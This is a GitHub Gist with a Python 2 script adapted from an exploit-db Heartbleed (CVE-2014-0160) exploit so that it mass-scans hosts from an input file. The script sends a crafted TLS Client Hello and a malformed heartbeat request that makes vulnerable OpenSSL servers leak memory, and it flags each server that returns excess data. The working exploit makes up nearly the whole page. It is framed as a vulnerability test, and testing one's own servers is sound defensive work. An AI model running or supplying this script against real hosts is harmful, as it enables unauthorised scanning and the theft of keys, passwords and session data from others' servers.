Last active
August 29, 2015 13:58
-
-
Save robison/10182415 to your computer and use it in GitHub Desktop.
quick update of http://www.exploit-db.com/exploits/32745/ to support an inputfile consisting of line-separated hostnames/IPs to check
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import gevent.monkey | |
gevent.monkey.patch_socket() | |
gevent.monkey.patch_select() | |
import gevent | |
import select | |
import socket | |
import struct | |
import sys | |
import time | |
from optparse import OptionParser | |
options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') | |
options.add_option('-s', '--server', dest='server', help='Specify unique host to test') | |
options.add_option('-p', '--port', dest='port', type='int', default=443, help='TCP port to test (default: 443)') | |
options.add_option('-i', '--input-file', dest='inputfile', help='Input file containing list of hosts to test') | |
opts, args = options.parse_args() | |
with open(opts.inputfile) as inputfile: | |
hosts = inputfile.read().splitlines() | |
def h2bin(x): | |
return x.replace(' ', '').replace('\n', '').decode('hex') | |
hello = h2bin(''' | |
16 03 02 00 dc 01 00 00 d8 03 02 53 | |
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf | |
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 | |
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 | |
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c | |
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 | |
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 | |
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c | |
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 | |
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 | |
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 | |
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 | |
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 | |
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 | |
00 0f 00 01 01 | |
''') | |
hb = h2bin(''' | |
18 03 02 00 03 | |
01 40 00 | |
''') | |
def hexdump(s): | |
for b in xrange(0, len(s), 16): | |
lin = [c for c in s[b : b + 16]] | |
hxdat = ' '.join('%02X' % ord(c) for c in lin) | |
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin) | |
print ' %04x: %-48s %s' % (b, hxdat, pdat) | |
def recvall(s, length, timeout=5): | |
endtime = time.time() + timeout | |
rdata = '' | |
remain = length | |
while remain > 0: | |
rtime = endtime - time.time() | |
if rtime < 0: | |
return None | |
r, w, e = select.select([s], [], [], 5) | |
if s in r: | |
data = s.recv(remain) | |
# EOF? | |
if not data: | |
return None | |
rdata += data | |
remain -= len(data) | |
return rdata | |
def recvmsg(s, host): | |
try: | |
hdr = recvall(s, 5) | |
if hdr is None: | |
print host, ': Unexpected EOF receiving record header - server closed connection' | |
return None, None, None | |
typ, ver, ln = struct.unpack('>BHH', hdr) | |
pay = recvall(s, ln, 10) | |
if pay is None: | |
print host, ': Unexpected EOF receiving record payload - server closed connection' | |
return None, None, None | |
print host, ': received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) | |
return typ, ver, pay | |
except Exception: | |
return None, None, None | |
def hit_hb(s, host): | |
while True: | |
typ, ver, pay = recvmsg(s, host) | |
if typ is None: | |
print host, ': No heartbeat response received, server likely not vulnerable' | |
s.close() | |
return False | |
if typ == 24: | |
print host, ': Received heartbeat response:' | |
if len(pay) > 3: | |
print host, ': WARNING: server returned more data than it should - server is vulnerable!' | |
else: | |
print host, ': Server processed malformed heartbeat, but did not return any extra data.' | |
s.close() | |
return True | |
if typ == 21: | |
print host, ': received alert/error: type = %d, ver = %04x, length = %d; likely not vulnerable' % (typ, ver, len(pay)) | |
print host, ': Server returned error, likely not vulnerable' | |
s.close() | |
return False | |
def test_host(host): | |
try: | |
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
print host, ': Connecting...' | |
s.connect((host, opts.port)) | |
print host, ': Sending Client Hello...' | |
sys.stdout.flush() | |
s.send(hello) | |
print host, ': Waiting for Server Hello...' | |
sys.stdout.flush() | |
while True: | |
typ, ver, pay = recvmsg(s, host) | |
if typ == None: | |
print host, ': Server closed connection without sending Server Hello.' | |
return | |
# Look for server hello done message. | |
if typ == 22 and ord(pay[0]) == 0x0E: | |
break | |
sys.stdout.flush() | |
print host, ': Sending heartbeat request...' | |
s.send(hb) | |
hit_hb(s, host) | |
except socket.error, e: | |
print e | |
def main(): | |
threads = [] | |
for host in hosts: | |
threads.append(gevent.spawn(test_host, host)) | |
gevent.joinall(threads) | |
if __name__ == '__main__': | |
main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment